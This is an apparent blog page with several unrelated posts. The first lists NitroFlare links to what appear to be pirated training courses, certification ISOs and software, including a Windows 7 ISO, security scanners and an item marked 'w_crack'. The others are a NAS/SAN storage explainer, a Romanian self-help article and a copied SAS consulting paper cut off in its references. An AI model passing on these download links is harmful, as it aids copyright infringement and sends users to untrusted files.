Wednesday, December 22, 2021

NitroFlare downloads Part #1

https://nitro.download/view/93C7AA7AC7E3966/Acronis.Backup.%26.Recovery.Server.With.Universal.Restore.v11.0.17318.en.rar
https://nitro.download/view/EED4E4036CACF48/Adobe_Premiere_Pro_CC_Fundamentals.rar
https://nitro.download/view/9507B3186B73BBD/Adobe_Premiere_Pro_CS6.rar
https://nitro.download/view/FC83D298AFC6DF2/Angular_Js_-_Get_Started.rar
https://nitro.download/view/A7D583CCE0E4AC2/Build_Your_Own_NetApp_Storage_Lab.rar
https://nitro.download/view/218D09D3DA26FF8/CA.PYTHON.FOR.BEGINNERS.22.2.part1.rar
https://nitro.download/view/78C3D4BF0DFD09B/CA.PYTHON.FOR.BEGINNERS.22.2.part2.rar
https://nitro.download/view/F7C4CB81DEF6109/CA.PYTHON.FOR.BEGINNERS.22.2.part3.rar
https://nitro.download/view/6856F6ACF8194E4/Color_Correction_and_Grading_in_Adobe_Premiere_Pro_and_SpeedGrade.rar
https://nitro.download/view/123758C7447B976/Django_Fundamentals.rar
https://nitro.download/view/354200A91CF53D7/E6WmUCHy__Learning_Python_Made_Easy.rar
https://nitro.download/view/30B4D2D03EAE55E/F730hMoz_.PythonSkil.rar
https://nitro.download/view/F9CB5731E8C754E/FuXfpb9X__pythonpand.rar
https://nitro.download/view/015F1E37272A01C/Infinite_Skills_-_Video_And_Animation_With_Adobe_Photoshop.rar
https://nitro.download/view/D1593FCD5D504A6/Infinite_Skills._Advanced_HTML5_Training.rar
https://nitro.download/view/253778FB9CA1BD1/Introduction_to_Firewalls.rar
https://nitro.download/view/71B796044E37076/Introduction_to_HTML_for_Designers.rar
https://nitro.download/view/92AC8C1A8099F15/Introduction_to_jQuery_for_Designers.rar
https://nitro.download/view/5F159C664DA43BB/Just_enough_Python_Programming_for_Beginners.part4.rar
https://nitro.download/view/2CCF3DC2318053D/Project-Based_Python_Programming_For_Kids_and_Beginners__Video_.rar
https://nitro.download/view/EEC35E3D0DA6AF1/Python_Programming_in_5_Hours.part1.rar
https://nitro.download/view/1A501131E2FF856/Python_Programming_in_5_Hours.part2.rar
https://nitro.download/view/65B03CCE82CE19E/Python_Programming_in_5_Hours.part3.rar
https://nitro.download/view/42A1DA16DDCB604/rxc50.Unit.Testing.in.Python.rar
https://nitro.download/view/D834009BDD88B70/XumTDwh9__Python__Ba.rar

https://nitro.download/view/D2C66FBEF1D73E9/Acunetix-v8.0.rar
https://nitro.download/view/CB1B4C513AB5C28/burp_pack.zip
https://nitro.download/view/957B14E0900D4C3/BurpSuite.app.zip
https://nitro.download/view/953B666F88674C0/CCNA_Study_Guide_%2B_Ebook_%2B_Network_Visualizer_5.0_w_crack
https://nitro.download/view/6A3E1F2AD95D2AF/Check_Point_Certified_Security_Administrator_Install_%26_Deploy.rar
https://nitro.download/view/AC30417859774D1/Citrix_XenServer_WMVs.rar
https://nitro.download/view/50FEA3ACF7EFBB6/CompTIA_CSA%2B_Study_Guide_Exam_CS0-001.zip
https://nitro.download/view/A8715D6E00B68F6/CompTIA-Cloud-Certification-Practice-Exams-Exam-CV0-002_Technet24.rar
https://nitro.download/view/692E19A2A46E05F/CompTIA-PenTest-Certification-All-in-One-Exam-Guide_Exam-PT0-001_Technet24.rar
https://nitro.download/view/D1593FCD5D504A6/Infinite_Skills._Advanced_HTML5_Training.rar
https://nitro.download/view/1C35B1D07875E2C/Introduction_to_CSS_for_Designers.rar
https://nitro.download/view/71B796044E37076/Introduction_to_HTML_for_Designers.rar
https://nitro.download/view/7C047767CFED677/ITPro_TV_-_OpenVPN_in_Linux.rar
https://nitro.download/view/2CEC8928F9D4D84/Lynda_-_Computer_Forensics_Essential_Training_%28Aug_20%2C_2014%29.rar
https://nitro.download/view/EBF1414DB0FE3D6/Lynda_-_Internet_Marketing_Basics_-_MG.rar
https://nitro.download/view/351B29DE0D3D115/Penetration_Testing_with_Backtrack_3.2.rar
https://nitro.download/view/8B3EAE632DF4DA5/Pluralsight_-_Advanced_Malware_Analysis_-_Combating_Exploit_Kits.rar
https://nitro.download/view/CF61C21F87C18AF/Pluralsight_-_Automated_Web_Testing_with_Selenium.rar
https://nitro.download/view/11253678B35572E/Pluralsight_-_Exploit_Development_and_Executin_with_Metasploit.rar
https://nitro.download/view/742D42D7DF676F0/Pluralsight_-_Python_Beyond_The_Basics.rar
https://nitro.download/view/3B68728B423A8EE/Pluralsight_-_Raspberry_Pi_for_Developers_Tutorial-kEISO.rar
https://nitro.download/view/62AAB424BEA0E7A/Pluralsight_-_VMware_Virtual_SAN_%28VSAN%29_Fundamentals.rar
https://nitro.download/view/6D325666B0F58AD/PluralSight_C%23_From_Scratch_Part_2.rar
https://nitro.download/view/031181B896F67E4/PLURALSIGHT_INTRODUCTION_TO_BROWSER_SECURITY_HEADERS_TUTORIAL.rar
https://nitro.download/view/700736A9846DA26/Sybex-CCNA-Cloud-Complete-Study-Guide_Exam-210-451-and-Exam-210-455_Technet24.rar

https://nitro.download/view/7A3841C0EC04228/CBT_Nuggets_70-413_Designing_and_Implementing_a_Server_Infrastructure.rar
https://nitro.download/view/80E695705D0B63F/CEH_Certified_Ethical_Hacker.iso
https://nitro.download/view/1555EB149E93851/CISSP_Certified_Information_Systems_Security_Professional.iso
https://nitro.download/view/ED7957237F0BF61/en_windows_7_ultimate_x86_dvd.iso
https://nitro.download/view/89BE4DCFCB74438/Pluralsight_-_Ethical_Hacking_-_Sniffing.rar
https://nitro.download/view/093F8AE3D8337C5/Pluralsight_C%23_From_Scratch__OGNADROL_.rar
https://nitro.download/view/19224A472C05F9E/PLURALSIGHT_CREATE_A_WINDOWS_10_IMAGE_TUTORIAL.rar
https://nitro.download/view/B94C3C7C18EF4CB/PluralSight_Electronics_Fundamentals_Tutorial.rar
https://nitro.download/view/514645DCD3BFC7D/PluralSight_Network_Operations_for_Comptia_NetworkPlus_N10-006_Tutorial.rar
https://nitro.download/view/D4ACF26D065A42F/PLURALSIGHT_SOCIAL_MEDIA_MARKETING_FOR_YOUR_STARTUP_TUTORIAL.rar
https://nitro.download/view/B75D9428CF90A0B/PLURALSIGHT_UNDERSTANDING_ENTERPRISE_ARCHITECTURE_TUTORIAL.rar
https://nitro.download/view/377EF4EF1A81457/Pluralsight-CCIE_Routing_and_Switching__Implement_IPv4_and_IGPs.rar
https://nitro.download/view/1B5BD178D2E7A12/PLURALSIGHT.ETHICAL.HACKING.HACKING.WEB.APPLICATIONS.TUTORIAL-kEISO.tar
https://nitro.download/view/AB2018DFAA59623/PLURALSIGHT.ETHICAL.HACKING.HACKING.WEB.APPLICATIONS.TUTORIAL.rar
https://nitro.download/view/3D42EEA91581060/PLURALSIGHT.ETHICAL.HACKING.HACKING.WEB.SERVERS.TUTORIAL-kEISO.rar
https://nitro.download/view/C5046EA35D1584A/PLURALSIGHT.ETHICAL.HACKING.HACKING.WEB.SERVERS.TUTORIAL-kEISO.tar
https://nitro.download/view/5450A7AC512557F/PLURALSIGHT.ETHICAL.HACKING.SQL.INJECTION.TUTORIAL-kEISO.rar
https://nitro.download/view/6A49ADC990A028E/PLURALSIGHT.ETHICAL.HACKING.SQL.INJECTION.TUTORIAL-kEISO.tar
https://nitro.download/view/C4B79FEFEE306C9/PLURALSIGHT.ETHICAL.HACKING.SYSTEM.HACKING.TUTORIAL-kEISO.tar
https://nitro.download/view/0E4C97611808DC7/PLURALSIGHT.PENETRATION.TESTING.AND.ETHICAL.HACKING.WITH.KALI.LINUX.TUTORIAL-kEISO.tar
https://nitro.download/view/E6CE492B8BF25D6/Pluralsight.Windows.Registry.Troubleshooting-XQZT.rar
https://nitro.download/view/F8968F7D0E994A7/PMP_Project_Management_Professional.iso
https://nitro.download/view/B3E7ADC45AF20F7/RHCE_1_Red_Hat_Certified_Engineer.iso
https://nitro.download/view/BC4B21E813783EF/RHCE_2_Red_Hat_Certified_Engineer.iso
https://nitro.download/view/EEE78BE9F42A40F/SCJP_Sun_Certified_Java_Programmer.iso

https://nitro.download/view/B682A7014416489/Agile_Project_Management.iso
https://nitro.download/view/A8DA7BDAB60450E/C%23_C-Sharp.iso
https://nitro.download/view/FC75150EFBCFD6F/CBT_Nuggets_-_Microsoft_Visio_2010_for_IT_Professionals.rar
https://nitro.download/view/7B9C581570272E1/CCA_Citrix_Certified_Administrator.iso
https://nitro.download/view/564E0AB33C5D1B8/CISA_Certified_Information_Systems_Auditor.iso
https://nitro.download/view/ACED94F8309BE38/CISM_Certified_Information_Security_Manager.iso
https://nitro.download/view/6C24B7C5D60BD9A/CIW_Certified_Internet_Web_Professional_-_CIW_Foundations.rar
https://nitro.download/view/EFD25D3951F3FDB/CIW_Certified_Internet_Web_Professional_-_JavaScript_Fundamentals.iso
https://nitro.download/view/4F03A66A39258AF/CIW_Certified_Internet_Web_Professional_-_Perl_Fundamentals.rar
https://nitro.download/view/2CB79F2A130ABCC/CWNA_Certified_Wireless_Network_Administrator.iso
https://nitro.download/view/4ADE0DD5F66690B/CWNA_Update.rar
https://nitro.download/view/E7EFDB6C29CB0B7/CWNE_Certified_Wireless_Network_Expert.iso
https://nitro.download/view/B8255A92973F557/End_User_Security.rar
https://nitro.download/view/20D1450ECB0E442/ITIL_Information_Technology_Infrastructure_Library.iso
https://nitro.download/view/492F25D47CADB00/LPIC-1_Linux_Professional_Institute_Certification.rar
https://nitro.download/view/4E6856E20F9C1C1/LPIC-2_Linux_Professional_Institute_Certification.rar
https://nitro.download/view/C801F865F23A342/OCA-DBA_Oracle_Certified_Associate_-_Database_Administrator.iso
https://nitro.download/view/F90D5961C27E393/SSCP_Systems_Security_Certified_Practitioner.iso
https://nitro.download/view/E220E29940B4453/VBScript_Visual_Basic_Scripting.iso
https://nitro.download/view/F9440DDFA2B2B12/VCP_VMware_Certified_Professional.iso
https://nitro.download/view/05007C64BC75D74/Wireless%23.rar
https://nitro.download/view/8619B2205D3CD87/ZCE_Zend_Certified_Engineer_PHP_5.iso

Friday, December 17, 2021

Storage VM

A lot of books miss the basics. Knowing them makes building on the concepts much easier.

NAS = Just like a normal fileserver, except that it is single purpose and usually designed for large capacity versus small physical size.

SAN = A machine that serves block-based storage to fileservers. It is inherently a back-end sort of connection: users do not connect to the SAN. They connect to the fileservers, which connect to the SAN.

The purpose is to separate the physical storage (hard drives, RAID) from the fileserver. Started out as a replacement for those external RAID cages that were connected to fileservers via SCSI cables. But you can only cram so many SCSI cards into a server, and they had to be physically close to the fileserver because SCSI cables can only be so long.

So they designed a protocol called iSCSI that allows the controller-to-drive communications to be run over different links than just a SCSI cable. Now your storage can be in another rack, another room, or even another building. Although iSCSI is routable, you aren't going to get great performance across a WAN. But it can have its uses. By "virtualizing the SCSI cable", you can run the protocol over whatever medium works at the moment. FibreChannel, ethernet, whatever 10gb-over-magic comes around the bend.

Further, because those connections are one-to-many or many-to-one (unlike SCSI cables which are one-to-one), you can have one SAN box serving up storage to multiple servers. This allows you to optimize your capacity. Say you have 10 servers, all with three drives. In RAID5, you lose one of those drives to redundancy. So in your 10 servers, you've got 10 drives of "lost" capacity. So, you buy a SAN box and rebuild. You cram those 30 drives into the SAN box and (simplifying) you can decide that maybe you only need 3 drives worth of redundancy. So instead of 20 drives' worth of storage you get 27 drives' worth. And your techs only have to look after one box to replace failed drives instead of 10.

Further, further, a SAN lets you virtualize the storage volumes. You can carve up one 1000gb RAID volume into smaller pieces. You can do it the old fashioned way, and just give each server a range of blocks on the drive, like partitioning a hard drive in a PC. But with modern LVM layers, you can abstract that away. To increase capacity, you don't have to back up, shut down, add drives, rebuild the RAID and then repartition and restore. You just plug in drives, the SAN box can reshape itself online, and then you can tell the LVM to just increase the number of blocks available to the various logical volumes.

In the end, it starts looking just like a transactional or key-value database, where each record is a storage block. The fileservers know that they have X number of blocks of storage, and the SAN figures out how to keep track of them.

It also simplifies backups and helps with redundancy.

Your task is to figure out all the specifics and how to implement all of this, of course.

The key to remember: it is virtual hard drives. Just like how RAID takes many drives and makes one virtual hard drive, SANs take many hard drives, combines them into one or more giant hard drive(s) which can THEN be carved up into smaller virtual drives. Unless you are dealing with fancy filesystems, only one machine can connect to one hard drive at a time. A SAN can't give clients files. It can only give its clients blocks of storage, and it is up to the client to deal with the filesystem.

Vrei sa devii mai inteligent?

Iata cele mai eficiente metode:

Creierul uman este un organ complex care controleaza corpul, gandurile, starea de spirit si nu in ultimul
rand, iti controleaza viata. Exista oameni care il folosesc foarte mult si oameni care il folosesc prea putin, dar exista si unii oameni care il forteaza la limitele maxime.

Iata cateva tactici enumerate de BusinessInsider.com care te vor ajuta sa iti antrenezi constant mintea chiar si atunci cand nu mai esti tocmai tanar si care iti vor imbunatati agilitatea intelectuala si dezvoltarea cognitiva.

Renunta la multitasking
Faptul ca mintea umana se poate concentra la doar cate un lucru pe rand este un lucru dovedit stiintific.
Chiar daca poti rezolva in acelasi timp mai multe task-uri usoare, cele care necesita concentrare sau o decizie importanta merita intreaga ta atentie, spun specialistii.

Fa si exercitii intelectuale, nu doar fizice
Majoritatea renunta la invatat in momentul in care termina liceul sau facultatea, insa creierul trebuie tinut in forma invatand mereu ceva nou, fie ca e vorba de o limba straina, un instrument musical sau pur si simplu, noi aptitudini.

Descopera misterele care te inconjoara
Foloseste-ti creierul pentru a explora tot ce se intampla in jurul tau si exerseaza-ti intelectul refuzand sa accepti lucrurile asa cum apar. Adreseaza mereu intrebari si da frau liber curiozitatii, te sfatuiesc specialistii.

Cunoaste-ti norma de somn
Atat corpul cat si creierul tau au nevoie de somn, insa trebuie sa iti cunosti norma de odihna.
Unii oameni functioneaza suficient de bine cu 5-6 ore de somn, in timp ce altii au nevoie de 8-9 ore pentru a da randament maxim, de aceea este important sa iti cunosti limitele daca vrei ca si mintea ta sa fie odihnita. In zilele libere ai putea sa incerci sa dormi mai mult decat de obicei, pentru ca asta ajuta la relaxarea mintii si iti este de folos pentru a invata mai repede.

Nu renunta la miscare
Incearca sa te plimbi in timp ce citesti o carte, pentru ca specialistii sustin ca asta te ajuta sa memorezi mult mai bine. Exercitiile fizice regulate, in mod deosebit, reprezinta cea mai buna modalitate de a imbunatati capacitatea creierului in toate ariile, chiar si pentru creativitate.

Socializeaza

Activitatea sociala este un factor bine cunoscut care pastreaza agerimea mintii chiar si la o varsta mai inaintata.
Foloseste-te de internet pentru a-ti pastra activitatea intelectuala
Cercetatorii de la Universitatea California Los Angelesau aratat ca activitatea online stimuleaza zone ale creierului care este responsabila de luarea deciziilor si de rationamentele complexe.

Mananca ciocolata neagra
Studiile arata ca ciocolata neagra este responsabila de eliberarea unei substante chimice importante pentru creier, numita dopamina, utila pentru memorie.

Exerseaza lucruri cu mana pe care nu o folosesti de obicei
Folosirea mainii stangi, sau celei drepte dupa caz, stimuleaza creierul in parti importante si este si o sursa de amuzament, spun specialistii.

Permite-ti sa razi cat mai des
Cercetarile au demonstrat ca endorfinele eliberate atunci cand razi au un efect pozitiv asupra sistemului imunitar.

Exerseaza gandirea pozitiva
Gandirea pozitiva este o modalitate buna de a-ti pastra creierul activ mereu si reduce nivelul de stres, in timp ce gandirea negativa poate induce o depresie a creierului si chiar a sistemului imunitar.

Munca pastreaza creierul antrenat
Majoritatea oamenilor abia asteapta sa iasa la pensie pentru a scapa de activitatile obositoare din fiecare zi. Cu toate acestea, munca este un factor esential, necesar chiar si dupa ani intregi de serviciu, spun specialistii.

Urmareste presa zilnic
Antrenamentul mintii se datoreaza in mare parte asimilarii de noi informatii, de aceea evenimentele zilnice te pot ajuta in acest sens, cu conditia sa nu te streseze foarte tare.

Asculta muzica
O alta modalitate de a-ti pastra creierul activ este sa asculti muzica pe care in mod normal nu ai asculta-o. Muzica are capacitatea de a elibera emotii pozitive, spun specialistii.

Mananca sanatos
Anumite ingrediente din mancare pot fi benefice pentru dezvoltarea capacitatilor intelectuale.
Evita mancarea care ingrasa si concentreaza-te asupra legumelor si fructelor, atat pentru sanatatea corpului cat si a mintii tale.

De asemenea, specialistii te sfatuiesc sa bei foarte multa apa, pentru ca aceasta ajuta celulele corpului sa
functioneze corect si te hidrateaza atat pe interior cat si la nivel vizibil.

Ia-ti concediul anual
Renunta la job pentru cateva zile si calatoreste cat mai mult, pentru ca studiile au aratat ca excursiile turistice reusesc sa iti largeasca orizonturile intelectuale considerabil.

Implica-te in dezbateri
Dezbaterile amicale cu cei apropiati te ajuta la imbunatatirea gandirii logice, rationale si a aptitudinilor creative.

Invata sa iesi uneori din tipar
Daca ai tendinta de a face acelasi lucru zilnic, incearca sa intrerupi ritmul activitatilor tale.
Creierul se bazeaza pe activitati diferite pentru a ramane activ, de aceea ar trebui sa "spargi" rutina pentru a realiza asta.

Relaxeaza-te
Un exercitiu simplu de concentrare ar fi sa stai relaxat si sa acorzi o atentie sporita inspiratiei si expiratiei.
Acest exercitiu te ajuta sa te relaxezi si sa iti pastrezi mntea concentrata intr-un singur punct, lucru util atat pentru intelect cat si pentru fizic, potrivit expertilor.

Dezvolta gandirea critica
Gandirea critica te determina sa iti pui intrebari cu privire la propria persoana si sa cauti dovezi pentru
presupunerile tale.

Formuleaza-ti propriile afirmatii
Afirmatiile cu privire la scopurile finale sunt o modalitate foarte buna de a-ti pastra mintea focusata asupra obiectivelor stabilite.
Cand folosesti afirmatiile despre viziunea proprie, iti folosesti in acelasi timp si imaginatia, activand regiuni diferite ale creierului care ajuta memoria dar si creativitatea.

Gandeste creativ
Nu ai cum sa gandesti creativ, atata timp cat esti subjugat cunostintelor si normelor impuse de societate, de aceea trebuie sa incerci sa folosesti gandirea si fara aptitunile clare de rationament, ca o modalitate excelenta de a fructifica o mare parte din capacitatea naturala a creierului.

Consulting: Critical Success Factors

Kirk Paul Lafler, Software Intelligence Corporation
Charles Edwin Shipp, Shipp Consulting
Abstract
The age of the Internet is changing the way many companies do business - and the type of consultant they need.
The consultants of tomorrow will require different skills than the consultants of today and yesterday. Today's
consultant may just as likely have graduated with an MBA degree as with a technical degree. As hired advisers to a
company, a consultant often tackles a wide variety of business and technical problems and provides solutions for
their clients. In many cases a consultant chooses this path as an attractive alternative career option after toiling in
industry for a number of years.
This paper describes the consulting industry from the perspective of the different types of organizations (e.g., elite,
Big Five accounting firms, boutique, IT, and independent) that they comprise. Specific attention will be given to the
critical success factors needed by today's and tomorrow's consultant.
Introduction
To become a successful SAS consultant, your SAS skill is paramount, followed by your skills in creating and
running a small business. Critical success factors include training and business preparation, the business plan,
marketing material, positioning and image, choosing your areas of services, and lastly, setting a billing rate or
project price. As a consultant, you find projects in programming or in SAS instruction, and work individually or team
with others. You learn how to market your services to small companies, large corporations or government
agencies. To assist you in getting started, a self-survey map will be made available in the SUGI presentation to
help you assess where you are and the options concerning where you would like to be.
Career Path Options
In most cases, a professional SAS consultant starts as an employee in a corporation, government or academic
office where he or she learns many valuable lessons and experiences in SAS planning and programming. Paths
then open to outside consulting opportunities, either as an independent consultant or teaming with others. That
was the past. Now it is more common for younger programmers to consider entering consulting earlier. It
remains a good career move for those near retirement or considering early retirement to prepare to work in some
areas of SAS as a consultant. There are some easy steps and lessons to learn in making this move.
The Portable Office
For a Consultant, portability means independence. This does not mean that everything you need is loaded into
your car and off you go. What it means is that items essential to your business can be accessed easily when
necessary. Examples include working from home and dialing in to where your systems and applications reside, or
being able to use a laptop or computing device wherever and whenever the need calls for it.
It is possible that a portable office is nothing more than your closest "full-service" copy center (e.g., FedExKinko's,
etc.). These types of "full-service" centers offer high quality amenities at affordable prices including reproduction,
fax, binding, telephone, computer publishing, printing, scanning, etc.
What does the portable office give you?
The basic definition of the portable office can be defined as follows:
1. Being productive away from "home" surroundings
2. Having what's necessary to conduct business
3. Having at your finger tips what's familiar to you.
What does the portable office look like?
Answering this question depends on when and where you need an office (e.g., plane, train, automobile, ship). The
definition of portability means to be able to conduct the activities of your business whenever and wherever
necessary. Naturally, the latest electronics have made this once difficult task less daunting. Today’s consultant
often uses one or more of the items listed below.
1. Laptop or notebook computer
2. Cellular telephone
3. Pager
4. PDA (Personal Digital Assistant)
5. Pocket tape recorder
6. Modem/fax
7. Portable printer
8. Rechargeable cigarette adapter
9. Battery charger
10. Batteries
11. Blank diskettes
12. High capacity storage device (e.g., Zip drive, optical read/write drive, etc.)
13. Learning tapes (e.g., career, management, languages, books, etc.)
14. Name and address book (e.g., telephone #s for airlines, car rentals, hotels, business associates, etc.)
Rate Setting
There are two ways to price your consulting services:
1. Set a rate according to the value of your time (i.e., hour or day or week)
2. Set a total price for a task, activity, or job.
The method you decide to use for establishing your rate is a personal decision. You could combine both methods
or invent an entirely new method to price the services you perform. Set up some rules to live by. You and your family
must be able to survive on the salary you pay yourself, you should be able to meet all of your financial obligations,
and hopefully show a profit (although this last point may not be a possibility when you are first starting out).
Before you begin to set your rate, the first thing to remember is that whatever rate you set must (or should) be a
competitive one. A second thing to remember is that there is no set or "fixed" price for any service. You will find a
range of prices (low to high and everything in between). It will be necessary to establish a rate within these upper
and lower ranges. Do not be convinced that the only way you'll be able to compete is to set the lowest price within
this range.
You should then spend time researching and learning all you can about the market you are seeking to sell your
services to. Make every attempt to answer the following questions. Is there a need for the services I provide? Is
there a competitor that can provide the same service as me? What types of services is my competition providing?
Are there opportunities that are not being pursued? How do other consultants sell their services?
Elements to factor in when determining consulting rate:
1. Type of job (system programming, application programming, training, etc.)
2. Cost of living
3. Overhead costs
4. Personal Training Costs (including getting up to speed)
5. Setting up to do business
6. Insurance (health, liability, auto, etc.)
7. Office equipment (including computer, telephone, FAX machine, supplies)
8. Vacation days
9. Include also marketing costs such as advertising.
Once a rate has been established, hold firm to it. This is only fair to existing and prospective clients alike. Rates
should only vary when special market forces or conditions out of your control dictate such an increase (e.g., cost of
living in a particular city, travel expenses, etc.). Certain things should be factored in when setting your rate:
1. Size of contact
2. Duration of contract
3. Type of work (common tasks, special skills required)
4. Working long hours, due to a priority deadline (charge more/extra)
5. Location that is less than ideal (travel, weather, pain/suffering)
6. Lodging rates that are extra high (will client absorb these costs?)
Taking Inventory of Your Skills
Knowing what you can provide clients and prospective clients is a valuable ingredient for success. First and
foremost, the services you intend to offer should be perceived as adding value in an already highly competitive
marketplace. Second, keep in mind that there will almost certainly be intense competition from other like-minded
individuals. Taking inventory of your skills involves the following steps:
1. List your skills/services (e.g., strategic planning, market analysis, systems analysis, technical writing, etc.)
2. Perform the following rankings for each skill/service:
a. Level of competence (e.g., up-to-date (current), competitive, and out-of-date)
b. Income level production for the past 12 months (largest to smallest)
c. Assess whether each skill/service is "Active" or "Passive" (e.g., Active---critical to clients you are
pursuing, Passive--non-critical to prospective clients)
3. Once ranked, categorize each skill by functional discipline (e.g., Business consulting, programming,
marketing, etc.)
4. Capture comments, features, successes, and failures about each skill/service. These comments, along
with rankings, will be used in the preparation of promotional materials.
Obtaining Leads
Obtaining leads about opportunities are vital to the success of every Consultant. But where are these opportunities
found and how can a Consultant use these to their advantage. This activity is often referred to as "Prospecting".
Prospecting for leads involves collecting information on prospective clients. But, before information can be
collected, it is vital for the Consultant to know where to look. Sources of Information include:
1. Local library
2. Local Newspaper
3. Directories
a. Associations
b. User Groups
c. Chamber of Commerce
d. Seminars
4. Indexes
a. The Newspaper Index
b. The Magazine Index
5. Employment databases
6. Federal Government publications
a. Commerce Business Daily
b. The Statistical Abstract
c. Special Industry Reports
7. The Bureau of Census
8. Department of Commerce
9. Department of Agriculture
10. State Government publications
a. State Registers
b. State Department of Commerce
c. State Business Offices
11. City Government publications
12. Books in Print
a. Information U.S.A.
b. Getting Yours
13. Newsletters
a. The Oxbridge Newsletter Directory
14. Internet
a. Job Lines (many employers advertise their openings as part of their web pages)
b. Web sites (e.g., www.Hotjobs.com, www.Monster.com, etc.)
Proposal Writing
Proposal writing can be one of the strongest sales tools a consultant has. It is a powerful tool that, unfortunately,
many consultants never take the time to master. The typical proposal explains who you are, what you are about,
why you are best for the job, how you will manage and perform the services of the contract, your understanding of
the client's requirements, your perception of the problem, your approach and/or methodology, your qualifications,
your previous experiences, your references, and costs.
The Basic Elements of a Proposal
Proposals are a lot like people. They come in all sizes and shapes, are written or typed on paper, and are usually
bound by front and back covers. Although they vary in length, format, and scope, they serve the same purpose - to
persuade a prospective (desired) client toward your services rather than one of your competitors. The following
elements are generally adhered to in every proposal:
1. Cover letter
2. Front cover with title and back cover
3. Table of Contents
4. Response Matrix or Cross Reference of Pertinent Information
5. Executive Summary
6. Introduction
7. Understanding of Problem(s) and Requirement(s)
8. Your Proposed Approach and/or Methodology
9. Resources and Personnel Qualifications (Staffing and Resources – include resumes)
10. Management Plan (Administrative and Project Management)
11. Conclusion
12. Appendixes (Supplemental Information)
Improving Skills/Position
Many Consultants believe they have mastered the necessary skills to be successful. But as technology evolves, it
becomes increasingly more important to continue learning, and consider specializing. Even if you already consider
yourself a good SAS programmer, with interests and abilities in several areas of the SAS software, specialization
is becoming more of a necessity. Consider additional training from several sources:
1) Self-paced computer-based training (CBT)
2) SAS-led courses (lecture / hands-on workshops)
3) Non-SAS Consultant-taught courses
4) SAS Manuals
5) Books by Users (BBU)
6) User Group presentations
An excellent way to improve or brush up on your skills is through computer-based training (CBT) modules. Many
popular topics are available for purchase or through subscription. All you need to access this treasure-trove of
knowledge is a computer and Web browser. SAS Institute, for example, offers topics that can be studied for a 90-
day period on the Web.
SAS Certified Professional Exams
To give your career a significant boost and to improve your prospects for success, the SAS Institute offers
certification testing for users in three key areas: 1) SAS Programming, 2) Predictive Modeling and 3) Data
Warehousing. These globally recognized certification tests are administered in more than 140 countries by a
global leader in testing services in the IT industry, and are taken in a controlled environment.
Two credentials are offered by SAS Institute for SAS programmers to consider:
1) SAS Certified Base Programmer Credential for SAS 9
a. SAS Base Programming Exam for SAS 9
2) SAS Certified Advanced Programmer Credential for SAS 9
a. SAS Base Programming Exam for SAS 9
b. SAS Advanced Programming Exam for SAS 9
SAS Institute offers users a credential for predictive modelers to consider:
1) Predictive Modeling Using SAS Enterprise Miner 5.2 Credential
a. Predictive Modeling Using SAS Enterprise Miner 5.2 Exam
Two credentials are offered by SAS Institute for SAS data warehouse professionals to consider:
1) SAS Certified Warehouse Development Specialist Credential
a. SAS Advanced Programming Exam for SAS 9
b. SAS Warehouse Technology Exam
c. SAS Warehouse Development Specialist Concepts Exam
2) SAS Certified Warehouse Architect Credential
a. SAS Warehouse Technology Exam
b. SAS Warehouse Architect Concepts Exam
SAS Alliance Partner Program
SAS consultants may want to consider applying to become a SAS Alliance Partner. Five core programs are
available to choose from, 1) Technology Program, 2) Consulting Program, 3) Application Program, 4) Outsourcing
Program, and 5) Reseller Program. Each program has three levels: 1) Platinum, 2) Gold and 3) Silver. For more
information about Alliance partnership opportunities, prospective candidates should access and review the SAS
Alliance Program Guide on the SAS Institute web site at http://www.sas.com/partners/programs/index.html.
Seeking Your Level
Once you have decided to be a SAS consultant, consider the appropriate level to begin at. Assess your skill level,
including what you like to do most, and what you like to do least. Your past experience doing similar things is
critically important. You should get the recommendations of other consultants you know. For your first project, it
may work out best to combine your skills with another consultant. Going through an agency is another good way to
start. This way you can concentrate on what you do best without all the other hassles associated with running a
consulting business. Here are increasing levels to consider:
1. Contract programming (through an agency)
2. Teaming with another consultant
3. Self-employed small business
4. Partnership
5. Small, single-person, corporation
6. Corporation with employees.
Code of Ethics and Client Relationship
Maintaining a code of ethics is an essential part of doing business. Webster's New World Dictionary defines ethics
as the study of standards of conduct and moral judgment. All too often we read and hear about ethical charges
being brought against one individual or another. Work out details in contracts, and only sign those you will
absolutely honor. Then use wisdom and common sense in how you conduct your business.
Summary
There are many aspects to preparing to become a SAS consultant. Education and experience in the main areas of
SAS programming are very important. Being able to work with people is a key success factor. And, being able to
run a small business as a corporation or as a sole-proprietor small business, determines your success. Careful
planning, preparation, organization, the ability to handle multiple tasks, and diligence are important factors for any
consultant to have. Learn from others, their successes as well as failures, to improve your chances for greater
success.
Becoming a consultant requires hard work. The value of preparation and on-going training cannot be
overemphasized. In addition to whatever skills you possess, give attention to how you will position yourself and
begin setting up a business. There is a lot more to being a successful SAS consultant than just knowing how to
code. Being a consultant requires wearing many hats equally well, especially one- and two-person companies.
This is where the challenges and the fun actually begin. If you ever wanted to learn how to prepare a business
plan, market your services, negotiate a contract, balance an expense account, and when that is done go about
doing what you do best, then the consulting profession may be your ticket to paradise. Consulting, after all,
requires knowing something about many business activities.
Evaluate how other consultants conduct business. Other consultants provide continuing training and support that
can help you, including SAS-L and various web sites for professional SAS programmers. This includes training,
self-study, learning about consulting, certification, and looking into the SAS Quality Partner® program. (Note: You
can apply to be in the program while at a corporation or university.) A good consulting book or two to add to your
library can also be helpful. Most importantly, a career as a SAS consultant should always be an enjoyable one.
Conclusion
Consulting is a wonderful and honorable profession. With the many benefits and rewards derived from being a
SAS consultant, probably the greatest joy of all is in knowing that your expertise is worth something to someone
else. This fact alone is worth all the sacrifice and hard work, knowing that the countless hours you spent (long after
a full days work) marketing, reading, and learning new techniques has finally paid off. There is something very
special about succeeding in what you do best. Most consultants do what they do, not because of the money, but
because of the enjoyment they receive when their knowledge is used to help someone else.
Acknowledgments
The authors would like to thank Li Zheng, WUSS 2007 Management, Careers & Professional Development Section
Chair; Dr. Besa Smith, WUSS 2007 Academic Program Chair; and MaryAnne Hope, WUSS 2007 Operations Chair
for accepting my abstract and paper, as well as the WUSS Leadership for their support of a great Conference.
References
“SAS Consulting: New Beginnings” (Kirk Paul Lafler and Charles Edwin Shipp) – Awarded “Best Contributed
Paper”, Proceedings of the Ninth Annual Western Users of SAS Software (WUSS) Conference – 2001.
"Training in a World of Cost-Cutting and Downsizing" (Charles Edwin Shipp and Kirk Paul Lafler), Proceedings
of the Eighth Annual Northeast SAS Users Group Conference - 1995.
"Training in a World of Cost-Cutting and Downsizing" (Charles Edwin Shipp and Kirk Paul Lafler), Proceedings
